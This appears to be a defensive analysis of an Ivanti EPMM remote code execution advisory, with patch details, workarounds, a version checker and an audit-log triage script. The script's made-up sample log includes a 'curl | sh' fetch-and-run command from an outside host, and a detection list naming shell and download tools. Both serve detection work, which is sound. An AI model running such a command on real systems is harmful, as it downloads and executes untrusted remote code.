Full Report
Ivanti warned customers today to patch a high-severity remote code execution vulnerability in Endpoint Manager Mobile (EPMM) exploited in zero-day attacks. [...]
Analysis Summary
# Vulnerability: Remote Code Execution in Ivanti Endpoint Manager Mobile (EPMM)
## CVE Details
- **CVE ID:** CVE-2026-6973
- **CVSS Score:** High Severity (Specific numerical score not provided in text)
- **CWE:** Improper Input Validation
## Affected Systems
- **Products:** Ivanti Endpoint Manager Mobile (EPMM) - On-premise version only.
- **Versions:** 12.8.0.0 and earlier.
- **Configurations:** Any on-premise instance whose administrative interface is reachable by the attacker. Exploitation requires an authenticated administrative account, whether obtained legitimately, through credential theft, or by chaining another vulnerability that grants admin access.
*Note: Ivanti Neurons for MDM, Ivanti EPM, and Ivanti Sentry are not affected.*
## Vulnerability Description
The vulnerability is classed as an Improper Input Validation weakness. A remote attacker who already holds administrative privileges on the EPMM instance can exploit it to execute arbitrary code on the underlying operating system of the appliance, stepping out of the management application and onto the host itself.
## Exploitation
- **Status:** Exploited in the wild before a fix was available (zero-day).
- **Complexity:** Low. The attack itself is not complex; the barrier is authentication.
- **Privileges Required:** High (an administrative account on the EPMM instance).
- **Attack Vector:** Network.
## Impact
- **Confidentiality:** High (Full system access).
- **Integrity:** High (Ability to execute arbitrary code/modify system files).
- **Availability:** High (Potential for system takeover or disruption).
## Remediation
### Patches
Ivanti has released the following security updates to address the flaw:
- EPMM 12.6.1.1
- EPMM 12.7.0.1
- EPMM 12.8.0.1
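Deciding whether a given appliance is covered by the fix is a per-branch comparison rather than a single "newer than X" check, because Ivanti shipped a separate fixed build for each supported release line. The following is an added example, not Ivanti's code or tooling: it maps a reported EPMM build number to the fixed build for its branch using only the version numbers stated in the advisory. One assumption is labelled in the code: for branches older than 12.6 (which the advisory covers under "12.8.0.0 and earlier" but does not give an in-branch fix for), the example recommends the newest fixed build.

```python
"""Map an on-premise EPMM build number to the fix level named in the advisory."""
from typing import Optional, Tuple

# Fixed builds listed in Ivanti's May 2026 EPMM advisory, keyed by release branch.
FIXED_BUILDS = {
    (12, 6): (12, 6, 1, 1),
    (12, 7): (12, 7, 0, 1),
    (12, 8): (12, 8, 0, 1),
}
# The advisory states that every build up to and including this one is affected.
LAST_AFFECTED = (12, 8, 0, 0)


def parse_version(text: str) -> Tuple[int, ...]:
    """Turn '12.7.0.1' into (12, 7, 0, 1); short strings are padded to four fields."""
    parts = text.strip().split(".")
    if not parts or not all(p.isdigit() for p in parts):
        raise ValueError(f"not a dotted numeric version: {text!r}")
    nums = tuple(int(p) for p in parts)
    return nums + (0,) * (4 - len(nums))


def assess(version_text: str) -> Tuple[str, Optional[str]]:
    """Return (status, recommended_build) for one EPMM instance.

    status is one of:
      'patched'  - at or above the fixed build of its own branch
      'affected' - at or below 12.8.0.0 and below its branch's fixed build
      'unlisted' - newer than anything the advisory names; re-check the advisory
    """
    v = parse_version(version_text)
    branch = v[:2]
    fixed = FIXED_BUILDS.get(branch)
    if fixed is not None:
        if v >= fixed:
            return "patched", None
        return "affected", ".".join(map(str, fixed))
    if v <= LAST_AFFECTED:
        # Assumption (not stated by the advisory): a branch older than 12.6 has no
        # in-branch fix named, so recommend moving to the newest fixed build.
        return "affected", ".".join(map(str, FIXED_BUILDS[(12, 8)]))
    return "unlisted", None


if __name__ == "__main__":
    for build in ("12.6.1.0", "12.7.0.1", "12.8.0.0", "12.5.0.0", "12.9.0.0"):
        print(build, "->", assess(build))
```

Feed it the build string from each appliance's inventory record; anything reported as `affected` gets the paired recommended build, and `unlisted` is a prompt to re-read the advisory rather than a clean bill of health.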
### Workarounds
- **Credential Management:** Because exploitation needs a valid administrative account, enumerate every account with admin rights, remove any that are not justified, and rotate the credentials of the rest immediately. This narrows the attacker's path but does not remove the flaw; only the patch does.
- **Access Control:** Keep the administrative interface off the public internet wherever possible and restrict it to trusted management networks, so that stolen or chained-for credentials cannot be used from arbitrary sources.
## Detection
- **Indicators of Compromise:** None are published in the source text. In their absence, review EPMM audit logs for administrative logins by unexpected accounts, from unexpected source addresses or at unusual times, and for shell or process activity on the appliance that no administrator initiated.
- **Detection and Exposure Checks:**
  - Use the Shadowserver dashboard (linked below) to see how many EPMM instances are exposed to the internet per region; this measures exposure, not compromise.
  - The same advisory fixes CVE-2026-5786, CVE-2026-5787, CVE-2026-5788 and CVE-2026-7821. Treat signs of their exploitation as a precursor, since an attacker may use them to obtain the admin access that CVE-2026-6973 requires.
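The log review described above is mostly a matter of comparing each privileged event against what the environment expects: the reviewed admin roster, the management networks admins log in from, and the absence of shell activity on an MDM appliance. The following is an added example and not an Ivanti tool; the log line format is a simplified, hypothetical one constructed for the example and is not EPMM's real log schema, and the sample lines, account names, networks and addresses are all made up.

```python
"""Triage constructed audit-log lines for the signals the advisory points at:
administrative logins outside the reviewed roster or management networks, and
shell or download commands executed on the appliance.

The line format below (timestamp user action src=... rest) is hypothetical and
was made up for this example; it is not EPMM's real log schema."""
import ipaddress
import re
from dataclasses import dataclass
from typing import Iterable, List, Set

# Constructed sample lines (not real EPMM output).
SAMPLE_LOG = """\
2026-05-13T08:02:11Z admin_jsmith ADMIN_LOGIN src=10.20.0.15 result=success
2026-05-13T08:05:42Z admin_jsmith CONFIG_CHANGE src=10.20.0.15 detail=policy-update
2026-05-13T02:17:03Z admin_svc ADMIN_LOGIN src=185.220.101.7 result=success
2026-05-13T02:17:09Z admin_svc EXEC src=185.220.101.7 cmd="sh -c 'curl -s http://198.51.100.9/x | sh'"
2026-05-13T02:18:30Z admin_svc ADMIN_LOGIN src=185.220.101.7 result=failure
2026-05-13T09:00:00Z admin_kchen ADMIN_LOGIN src=10.20.0.22 result=success
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<user>\S+) (?P<action>\S+) src=(?P<src>\S+)(?: (?P<rest>.*))?$"
)
# Substrings that have no business appearing in an EXEC event on an MDM appliance.
SHELL_HINTS = ("sh -c", "bash -c", "curl ", "wget ", "base64 ", "/dev/tcp", "nc ")


@dataclass(frozen=True)
class Finding:
    ts: str
    user: str
    reason: str
    line: str


def review_audit_log(lines: Iterable[str], known_admins: Set[str],
                     admin_networks: Iterable[str]) -> List[Finding]:
    """Return one Finding per suspicious event; an empty list means nothing stood out."""
    nets = [ipaddress.ip_network(n) for n in admin_networks]
    findings: List[Finding] = []
    for raw in lines:
        raw = raw.rstrip("\n")
        if not raw:
            continue
        m = LINE_RE.match(raw)
        if not m:
            # Lines the parser cannot read are surfaced rather than silently dropped.
            findings.append(Finding("?", "?", "unparsed line", raw))
            continue
        ts, user, action, src, rest = m.group("ts", "user", "action", "src", "rest")
        rest = rest or ""
        if action == "ADMIN_LOGIN" and "result=success" in rest:
            if user not in known_admins:
                findings.append(Finding(ts, user, "successful admin login by account not on roster", raw))
            try:
                addr = ipaddress.ip_address(src)
                if not any(addr in n for n in nets):
                    findings.append(Finding(ts, user, f"admin login from unexpected source {src}", raw))
            except ValueError:
                findings.append(Finding(ts, user, f"unparsable source address {src}", raw))
        if action == "EXEC":
            lowered = rest.lower()
            if any(hint in lowered for hint in SHELL_HINTS):
                findings.append(Finding(ts, user, "shell/download command executed on appliance", raw))
    return findings


def review_sample() -> List[Finding]:
    """Run the review over the constructed sample with a two-person admin roster."""
    return review_audit_log(SAMPLE_LOG.splitlines(),
                            {"admin_jsmith", "admin_kchen"},
                            ["10.20.0.0/16"])


if __name__ == "__main__":
    for f in review_sample():
        print(f"{f.ts} {f.user}: {f.reason}")
```

On the sample data the two legitimate administrators produce no findings, while the unrostered `admin_svc` account trips three: a login by an account that is not on the roster, a login from outside the management network, and a piped `curl | sh` execution on the appliance. Adapting it to real EPMM logs means replacing `LINE_RE` with the actual field layout and keeping the roster and network allowlist under change control, since those lists are what the review is measured against.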
## References
- Ivanti Blog: hxxps[://]www[.]ivanti[.]com/blog/may-2026-epmm-security-update
- Ivanti Security Advisory: hxxps[://]hub[.]ivanti[.]com/s/article/May-2026-Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM-Multiple-CVEs?language=en_US
- Shadowserver IoT Statistics: hxxps[://]dashboard[.]shadowserver[.]org/statistics/iot-devices/time-series/?date_range=7&vendor=ivanti&model=epmm&dataset=count&limit=100&group_by=geo&stacking=stacked